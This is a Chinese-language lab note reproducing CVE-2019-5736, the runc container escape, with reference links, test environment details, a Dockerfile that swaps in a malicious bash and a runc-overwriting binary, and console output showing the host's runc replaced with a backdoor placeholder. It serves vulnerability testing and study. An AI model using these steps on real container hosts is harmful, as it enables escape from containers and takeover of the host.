參考資訊:
https://github.com/q3k/cve-2019-5736-poc
https://www.cvedetails.com/cve/CVE-2019-5736/
https://github.com/twistlock/RunC-CVE-2019-5736
https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/containerd.io_1.2.0-1_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce_18.09.0~3-0~debian-buster_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb
測試環境:
Ubuntu 18.04 (4.15.0-20-generic)
Affected runc: 1.0.0-rc6
Affected Docker: < 18.09.2
測試步驟:
# cd
# git clone https://github.com/twistlock/RunC-CVE-2019-5736
# cd RunC-CVE-2019-5736/exec_POC
# vim Dockerfile
FROM ubuntu:18.04
COPY replace.sh /
RUN ["chmod", "+x", "/replace.sh"]
COPY overwrite_runc /overwrite_runc
RUN ["chmod", "+x", "/overwrite_runc"]
COPY new_runc /
RUN ["mv", "/bin/bash", "/bin/bash_original"]
COPY bash_evil /bin/bash
RUN ["chmod", "+x", "/bin/bash"]
ENTRYPOINT ["/bin/bash_original", "/replace.sh"]
# docker build -t cve .
# docker run --rm --name test cve
[+] Waiting for runC to be executed in the container...
開啟另一個視窗
# docker exec test bash
No help topic for '/bin/bash'
完成
# docker run --rm --name test cve
[+] Waiting for runC to be executed in the container...
[+] Got /proc/1071/exe as fd 3 in this process
[+] Opened runC (using /proc/self/fd/3) for writing
[+] Succesfully overwritten runC
[+] Done, shuting down ...
# runc -v
**THE ALL NEW AND IMPROVED RUNC**
[+] Your backdoor here ->